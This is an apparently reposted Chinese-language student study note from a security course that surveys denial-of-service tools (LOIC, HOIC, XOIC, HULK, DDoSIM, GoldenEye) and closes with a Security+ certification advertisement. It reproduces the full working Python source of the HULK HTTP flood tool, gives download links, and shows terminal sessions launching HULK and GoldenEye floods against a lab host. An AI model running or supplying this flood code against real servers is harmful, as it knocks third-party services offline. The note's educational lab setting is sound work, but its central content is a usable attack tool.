【安全牛学习笔记】拒绝服务***工具
拒絕服務(wù)***工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? Nmap? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2 |
root@K:~# cd /usr/share/nmap/scripts/
root@K:/usr/share/nmap/scripts# cat script.db | more
root@K:/usr/share/nmap/scripts# cat scirpt.db | grep dos
root@K:/usr/share/nmap/scripts# nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-05 08:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0037s latency).
PORT? ? STATE? ? SERVICE
445/tcp filtered microsoft-ds
MAC Address: 14:75:90:21:4f:56 (Tp-link Technologies)
Nmap done: 1 IP address (1 host up) scanned in 0384 seconds
匿名者拒絕服務(wù)工具包???????? 匿名者發(fā)布的Dos工具 ???????? ????- LOIC ????????????????? ????- HOIC ????????????????? ????- DDoSer ??????????????? 招募志愿者發(fā)放以上工具?????? 以上Dos工具不隱藏真是IP地址 |
盧瓦(LOIC) (Low Orbit Ion Canon)
LOTC是一個最受歡迎的DOS***工具。 這個工具被去年流行的***集團(tuán)匿名者用于對許多大公司的網(wǎng)絡(luò)***。?
它可以通過使用單個用戶執(zhí)行DOS***小型服務(wù)器,工具非常易于使用,即便你是一個初學(xué)者。 這個工具執(zhí)行DOS***通過發(fā)送UDP,TCP或HTTP請求到受害者服務(wù)器。 你只需要知道服務(wù)器的IP地址或URL,其他的就交給這個工具吧
低軌道離子炮(LOIC)是一個開源的網(wǎng)站壓力測試和抗拒絕服務(wù)測試工具,由C#語言開發(fā)。最初LOIC由Praetox科技開發(fā),目前由開源社區(qū)維護(hù)。LOIC可以通過TCP或UDP洪水的方式形成拒絕服務(wù)***(DoS),因而可能打斷業(yè)務(wù)正常運(yùn)行,安全和測試人員在做評估網(wǎng)站壓力測試時,請謹(jǐn)慎使用。 使用教程我記得我發(fā)過了自己在吧里找吧。
LOTC可以在linux系統(tǒng)上運(yùn)行
HOIC不能再linux運(yùn)行,能在windows運(yùn)行
root@K:~# ifconfig
192.168.1.116
msfadmin@metasploitable:~$ ifconfig
192.168.1.119
HOIC不能再linux運(yùn)行,能在windows運(yùn)行
其他拒絕服務(wù)工具???????????????????????????????????????? XOIC? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?***任意IP地址的指定端口 ????????????????????????? ????- git clone://git.code/sf.net/p/xoic/code xoic-code ????- http://xoicdoser.wordpress.com/ ?????????????????? ????-?三種模式:test、normal、Dos Attack ??????????????? ????-?支持協(xié)議:TCP/HTTP/UDP/ICMP |
- git clone://git.code/sf.net/p/xoic/code xoic-code,這個下載鏈接已經(jīng)空了,不能下載,另外找下載地址!
XOIC官網(wǎng)地址:http://xoicdoser.wordpress.com/,此鏈接里面的軟件有惡意代碼,建議不要下載!
XOIC是另一個不錯的DOS***工具。它根據(jù)用戶選擇的端口與協(xié)議執(zhí)行DOS***任何服務(wù)器。XOIC開發(fā)者還聲稱XOIC比上面的LOIC在很多方面更強(qiáng)大呢。??
一般來說,該工具有三種***模式,第一個被稱為測試模式,是非常基本的; 第二個是正常的DOS***模式; 最后一個是帶有HTTP / TCP / UDP / ICMP消息的DOS***模式,。?
對付小型網(wǎng)站來說,這是一個很有效的DDOS工具。 但是從來沒有嘗試的要小心點(diǎn),你可能最終會撞自己的網(wǎng)站的服務(wù)器。?
下載地址:https://sourceforge.net/projects/xoic/
其他拒絕服務(wù)工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? HULK - Http Unbearable Load King? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- Python腳本? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?隨機(jī)產(chǎn)生大量唯一的地址請求,避免緩存命中 ????????????????????? ????-?耗盡WEB服務(wù)器資源池? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ????- https://packetstormsecurity.com/files/download/112856/hulk.zip |
下載地址:https://github.com/grafov/hulk
Hulk DoS tool?
Hulk DoS tool 移植到Python語言。原來的Python工具由巴里Shteiman?
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
我只是移植的實(shí)用程序是快速和骯臟的。原函數(shù)的名字是保持和原來的邏輯大多保持太。次要功能添加:
您可以設(shè)置用于請求的自定義線程數(shù)
還設(shè)置了程序(好的去功能)所使用的內(nèi)核的數(shù)量
程序正確殺掉Ctl+C
此工具針對性的負(fù)載測試,并可能真的很糟糕配置的服務(wù)器。明智地使用它。
實(shí)例
$ hulk -site http://example.com/test/ 2>/dev/null
$ HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
有用的環(huán)境變量:
它設(shè)置為你的CPU GOMAXPROCS或更高一些。
hulkmaxprocs限制連接池(默認(rèn)為1024)。創(chuàng)建高負(fù)載使用更高的價值。
更多細(xì)節(jié):http://siberian.laika.name/node/7
許可證
亞力山大一grafov grafov@gmail.com版權(quán)
原綠巨人實(shí)用權(quán)威巴里Shteiman(http:/ / sectorix。com)。沒有任何引用許可源比它不是GPL。問作者關(guān)于許可證的原始效用。
走巨人牌工具版本??吹皆S可證。
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :? Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py <url>'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread?
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- HULK Attack Finished --"
#execute?
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
--------------------------------------------------------------------------------------
root@k:~# cd Desktop
root@k:~/Desktop# python hulk.py
----------------------------------------------------
USAGE: python hulk.py <url>
you can add "safe" affter url, to autoshut after dos
----------------------------------------------------
root@k:~/Desktop# python hulk.py http://192.168.1.119
其他拒絕服務(wù)工具???????????????????????????? DDoSIM ????????????????????????????????????? ????- 7層拒絕服務(wù)工具(模擬多個僵尸機(jī)) ???? ????-?隨機(jī)IP地址 ??????????????????????????? ????-?基于TCP連接的*** ???????????????????? ????-?應(yīng)用層DDoS*** ??????????????????????? ????-?正常的HTTP請求、非正常的HTTP請求式DDoS ????- SMTP DDos ???????????????????????????? ????-?隨機(jī)端口的TCP連接洪水 |
DDOSIM-Layer?
DDOSIM是另一種流行的DOS***工具。 顧名思義,它是通過模擬控制幾個僵尸主機(jī)執(zhí)行DDOS***。所有僵尸主機(jī)創(chuàng)建完整的TCP連接到目標(biāo)服務(wù)器。?
這個工具是用c++寫的,并且在Linux系統(tǒng)上運(yùn)行。?
這些是DDOSIM的主要特點(diǎn):?
模擬幾個僵尸***?
隨機(jī)的IP地址?
TCP-connection-based***?
應(yīng)用程序?qū)覦DOS***?
HTTP DDos等有效的請求?
與無效請求HTTP DDoS(類似于直流+ +***)?
SMTP DDoS?
TCP洪水連接隨機(jī)端口
在這里下載DDOSIM: http://sourceforge.net/projects/ddosim/
其他拒絕服務(wù)工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? GoldenEye? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ????- http/https拒絕服務(wù)***工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?安全研究為目的的Python腳本? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?隨機(jī)***向量,keep-alive,避免緩存命中 ????????????????????? ????- wget https://github.com/jseidl/GoldenEye/archive/master.zip ????- unzip master.zip? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- ./goldeneye.py http://1.1.1.1 -w 50 |
黃金眼(GoldenEye )HTTP拒絕服務(wù)工具?
黃金眼也是一個簡單但有效的DOS***工具。 這是在Python測試開發(fā)的DOS***,但是人們也把它當(dāng)做一種***工具了。
黃金眼
黃金是一個Python應(yīng)用程序安全測試之用!
黃金是一個HTTP DoS測試工具。
***向量的剝削:HTTP keep-alive +非緩存
使用
USAGE: ./goldeneye.py <url> [OPTIONS]
?OPTIONS:
? ? Flag? ? ? ? ? ?Description? ? ? ? ? ? ? ? ? ? ?Default
? ? -u, --useragents? ?File with user-agents to use? ? ? ? ? ? ? ? ? ? ?(default: randomly generated)
? ? -w, --workers? ? ? Number of concurrent workers? ? ? ? ? ? ? ? ? ? ?(default: 50)
? ? -s, --sockets? ? ? Number of concurrent sockets? ? ? ? ? ? ? ? ? ? ?(default: 30)
? ? -m, --method? ? ? ?HTTP Method to use 'get' or 'post'? or 'random'? (default: get)
? ? -d, --debug? ? ? ? Enable Debug Mode [more verbose output]? ? ? ? ? (default: False)
? ? -h, --help? ? ? ? ?Shows this help
公用事業(yè)
工具/ getuas.py -切取用戶代理列表從http://www.useragentstring.com/pages/useragentstring.php子頁面(例如,/ getuas.py http://www.useragentstring.com/pages/browserlist/)需要beautifulsoup4
RES /列表/用戶代理文本列表(每行一個)用戶代理字符串(從http://www.useragentstring.com)
更新日志
2014-02-20添加隨機(jī)生成的用戶代理(還是RFC標(biāo)準(zhǔn))。
2014-02-19刪除無聊的查閱情況和用戶代理。參考改進(jìn)的隨機(jī)性。添加外部用戶代理列表支持。
2013-03-26從線程處理。仍然有一些錯誤解決像我還不知道如何propperly關(guān)機(jī)經(jīng)理。
2012-12-09初始釋放
做
從對argparse getopt
從字符串。format() printf一樣
許可證
本軟件是在GNU通用公共許可證3版下的分布式(GPLv3)
法律公告
本軟件提供的教育用途!如果你從事任何非法活動,作者不承擔(dān)任何責(zé)任。通過使用這個軟件,你同意這些條款。
下載: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html
root@k:~/Desktop# wget https://github.com/jseidl/GoldenEye/archive/master.zip? ?//安裝黃金眼
root@k:~/Desktop# unzip master.zip? ? //解壓
root@k:~/Desktop# cd GoldenEye-master/
root@k:~/Desktop/GoldenEye-master# ls
goldeneye.py? README.md? res? util
root@k:~/Desktop/GoldenEye-master# python goldeneye.py
Please supply at least the URL
------------------------------------------------------------------------------------------------------
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
?USAGE: ./goldeneye.py <url> [OPTIONS]
?OPTIONS:
?FlagDescription Default
?-u, --useragentsFile with user-agents to use (default: randomly generated)
?-w, --workersNumber of concurrent workers (default: 10)
?-s, --socketsNumber of concurrent sockets (default: 500)
?-m, --methodHTTP Method to use 'get' or 'post'? or 'random'(default: get)
?-d, --debugEnable Debug Mode [more verbose output] (default: False)
?-h, --helpShows this help
------------------------------------------------------------------------------------------------------
root@k:~/Desktop/GoldenEye-master# python goldeneye.py http://192.168.1.119 -w 50 -m random
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
Hitting webserver in mode 'random' with 50 workers running 500 connections each. Hit CTRL+C to cancel.
該筆記為安全牛課堂學(xué)員筆記,想看此課程或者信息安全類干貨可以移步到安全牛課堂
Security+認(rèn)證為什么是互聯(lián)網(wǎng)+時代最火爆的認(rèn)證?
? ? ??牛妹先給大家介紹一下Security+
? ? ? ? Security+ 認(rèn)證是一種中立第三方認(rèn)證,其發(fā)證機(jī)構(gòu)為美國計算機(jī)行業(yè)協(xié)會CompTIA ;是和CISSP、ITIL 等共同包含在內(nèi)的國際 IT 業(yè) 10 大熱門認(rèn)證之一,和CISSP偏重信息安全管理相比,Security+ 認(rèn)證更偏重信息安全技術(shù)和操作。
? ? ? ?通過該認(rèn)證證明了您具備網(wǎng)絡(luò)安全,合規(guī)性和操作安全,威脅和漏洞,應(yīng)用程序、數(shù)據(jù)和主機(jī)安全,訪問控制和身份管理以及加密技術(shù)等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業(yè)和安全專業(yè)人士所普遍采納。
Security+認(rèn)證如此火爆的原因???
? ? ? ?原因一:在所有信息安全認(rèn)證當(dāng)中,偏重信息安全技術(shù)的認(rèn)證是空白的,?Security+認(rèn)證正好可以彌補(bǔ)信息安全技術(shù)領(lǐng)域的空白 。
? ??? 目前行業(yè)內(nèi)受認(rèn)可的信息安全認(rèn)證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術(shù)知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經(jīng)驗(yàn)都要5年以上,CISP也要求大專學(xué)歷4年以上工作經(jīng)驗(yàn),這些要求無疑把有能力且上進(jìn)的年輕人的持證之路堵住。在現(xiàn)實(shí)社會中,無論是找工作還是升職加薪,或是投標(biāo)時候報人員,認(rèn)證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現(xiàn)可以掃清這些年輕人職業(yè)發(fā)展中的障礙,由于Security+偏重信息安全技術(shù),所以對工作經(jīng)驗(yàn)沒有特別的要求。只要你有IT相關(guān)背景,追求進(jìn)步就可以學(xué)習(xí)和考試。
? ? ???原因二:?IT運(yùn)維人員工作與翻身的利器。
? ? ???在銀行、證券、保險、信息通訊等行業(yè),IT運(yùn)維人員非常多,IT運(yùn)維涉及的工作面也非常廣。是一個集網(wǎng)絡(luò)、系統(tǒng)、安全、應(yīng)用架構(gòu)、存儲為一體的綜合性技術(shù)崗。雖然沒有程序猿們“生當(dāng)做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當(dāng)午,不如運(yùn)維苦“的感慨。天天對著電腦和機(jī)器,時間長了難免有對于職業(yè)發(fā)展的迷茫和困惑。Security+國際認(rèn)證的出現(xiàn)可以讓有追求的IT運(yùn)維人員學(xué)習(xí)網(wǎng)絡(luò)安全知識,掌握網(wǎng)絡(luò)安全實(shí)踐。職業(yè)發(fā)展朝著網(wǎng)絡(luò)安全的方向發(fā)展,解決國內(nèi)信息安全人才的匱乏問題。另外,即使不轉(zhuǎn)型,要做好運(yùn)維工作,學(xué)習(xí)安全知識取得安全認(rèn)證也是必不可少的。
? ? ? ? 原因三:接地氣、國際范兒、考試方便、費(fèi)用適中!
CompTIA作為全球ICT領(lǐng)域最具影響力的全球領(lǐng)先機(jī)構(gòu),在信息安全人才認(rèn)證方面是專業(yè)、公平、公正的。Security+認(rèn)證偏重操作且和一線工程師的日常工作息息相關(guān)。適合銀行、證券、保險、互聯(lián)網(wǎng)公司等IT相關(guān)人員學(xué)習(xí)。作為國際認(rèn)證在全球147個國家受到廣泛的認(rèn)可。
? ? ? ? 在目前的信息安全大潮之下,人才是信息安全發(fā)展的關(guān)鍵。而目前國內(nèi)的信息安全人才是非常匱乏的,相信Security+認(rèn)證一定會成為最火爆的信息安全認(rèn)證。
轉(zhuǎn)載于:https://blog.51cto.com/11672938/1973424
總結(jié)
以上是生活随笔為你收集整理的【安全牛学习笔记】拒绝服务***工具的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Windows Phone笔记(3)触摸
- 下一篇: 就是好骑!骑ofo小黄蜂和舒畅早晨say